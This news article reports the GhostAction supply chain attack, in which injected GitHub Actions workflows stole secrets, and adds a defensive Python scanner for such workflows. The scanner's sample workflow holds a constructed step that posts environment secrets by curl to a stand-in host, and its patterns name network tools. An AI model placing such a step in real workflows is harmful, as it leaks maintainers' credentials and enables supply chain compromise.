A new supply chain attack dubbed GhostAction has rocked the open-source ecosystem by compromising 3,325 secrets across GitHub repositories. Uncovered by researchers at GitGuardian, the attack began surfacing publicly on September 2, 2025, after suspicious activity was detected in the FastUUID project. The attackers gained access to maintainer accounts and injected malicious GitHub Actions workflows, which executed automatically upon repository activity, harvesting secrets and sending them to an attacker-controlled server.
The attack wasn’t limited to FastUUID. A wider investigation revealed that at least 817 repositories were impacted, all using similarly crafted workflows to exfiltrate credentials via curl to a single endpoint: bold-dhawan[.]45-139-104-115[.]plesk[.]page. The malicious workflows targeted the secrets available to GitHub Actions by referencing the same secret names already used in each repository’s legitimate workflows, which put those credentials in scope for the attacker’s job as soon as it ran.
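As an added example (not code from GitGuardian or from any of the affected projects), the following heuristic scanner flags the shape of workflow described above: a step that references repository secrets and also invokes a raw network client against a host outside an allowlist. The workflow text, the secret names, the `collector.example.invalid` host and the allowlist are constructed for illustration; the real GhostAction payload is not reproduced on this page, and a YAML parser would make the step splitting more robust than the regex used here.

```python
"""Heuristic scanner for secret-exfiltration patterns in GitHub Actions workflows.

Added example, not the page's or any project's own code. It flags a step that
both references ${{ secrets.* }} and runs a network client (curl, wget, ...)
against a host not on an allowlist. All sample data below is constructed.
"""
import re
from typing import Dict, List

# Constructed sample: a benign publish step followed by a step shaped like the
# exfiltration the article describes (secret names copied from legitimate
# workflows, shipped with curl to an attacker host). Not the real payload.
SAMPLE_WORKFLOW = """\
name: release
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Upload to PyPI
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_API_TOKEN }}
        run: twine upload --repository-url https://upload.pypi.org/legacy/ dist/*
      - name: Cache warmup
        env:
          PYPI_API_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST --data-binary "$(env)" https://collector.example.invalid/c
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
NET_CLIENT = re.compile(r"\b(curl|wget|nc|ncat|socat|Invoke-WebRequest|Invoke-RestMethod)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
# A step begins at a list item carrying one of the usual step keys (heuristic).
STEP_START = re.compile(r"^\s*-\s+(?:name|uses|run|id|if|env|with|shell):", re.M)

# Hosts a release workflow legitimately talks to; tune per repository (assumed list).
ALLOWED_HOSTS = {
    "github.com", "api.github.com", "uploads.github.com",
    "upload.pypi.org", "registry.npmjs.org", "index.docker.io",
}


def split_steps(workflow_text: str) -> List[str]:
    """Cut the workflow into step-sized chunks without a YAML parser."""
    starts = [m.start() for m in STEP_START.finditer(workflow_text)]
    if not starts:
        return []
    starts.append(len(workflow_text))
    return [workflow_text[a:b] for a, b in zip(starts, starts[1:])]


def step_name(chunk: str) -> str:
    """Return the step's `name:` value, or its first line if it has none."""
    m = re.search(r"^\s*-?\s*name:\s*(.+)$", chunk, re.M)
    return m.group(1).strip() if m else chunk.strip().splitlines()[0]


def scan_workflow(workflow_text: str, allowed_hosts=ALLOWED_HOSTS,
                  min_secrets: int = 1) -> List[Dict]:
    """Report steps that expose secrets and contact an unrecognised host."""
    findings = []
    for chunk in split_steps(workflow_text):
        secrets = sorted(set(SECRET_REF.findall(chunk)))
        hosts = sorted({h.lower() for h in URL_HOST.findall(chunk)})
        external = [h for h in hosts if h not in allowed_hosts]
        # All three together is the exfiltration shape: secrets in scope, a raw
        # network client, and a destination the repository has no reason to use.
        if len(secrets) >= min_secrets and NET_CLIENT.search(chunk) and external:
            findings.append({"step": step_name(chunk), "secrets": secrets,
                             "external_hosts": external})
    return findings


if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"[!] step {f['step']!r} exposes {f['secrets']} to {f['external_hosts']}")
```

Run against every file under `.github/workflows/` on a pull request or as a scheduled check; the benign `twine upload` step passes because its only host is allowlisted and it uses no raw network client, while the second step is reported. Extending the allowlist to the flagged host silences the finding, which is why the allowlist itself needs review rather than being edited by whoever opens the PR.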
GitGuardian moved quickly upon discovery. On September 5, they opened GitHub issues across 573 of the compromised repositories and directly notified security teams at GitHub, npm, and PyPI. Meanwhile, roughly 100 repositories had already detected and reverted the malicious commits independently. Shortly thereafter, the attacker’s endpoint stopped responding, likely indicating that the campaign had been shut down—or at least paused.
The scale of the breach is significant. Stolen secrets include tokens and keys from a wide range of services such as PyPI, npm, DockerHub, GitHub itself, AWS, Cloudflare, and various databases. GitGuardian warned that at least nine npm and 15 PyPI packages were affected, raising concerns about potential malicious releases until the leaked secrets are revoked.
Interestingly, the attack bears similarities to the s1ngularity campaign from late August 2025, but GitGuardian believes the two are unrelated. They also highlighted that some companies had their entire SDK stacks compromised across multiple languages, including Python, Rust, JavaScript, and Go, emphasizing the wide blast radius of this supply chain breach.
The GhostAction attack underscores the urgent need for open-source maintainers to secure GitHub workflows, rotate exposed credentials immediately, and adopt stronger account protections like MFA. Reverting the malicious commit removes the workflow but does not recall anything it already sent, so every secret the job could read has to be treated as compromised and revoked. For teams managing SDKs or libraries, especially those publishing to public registries, now is the time to review and harden CI/CD pipelines to prevent such automated exfiltration attacks in the future.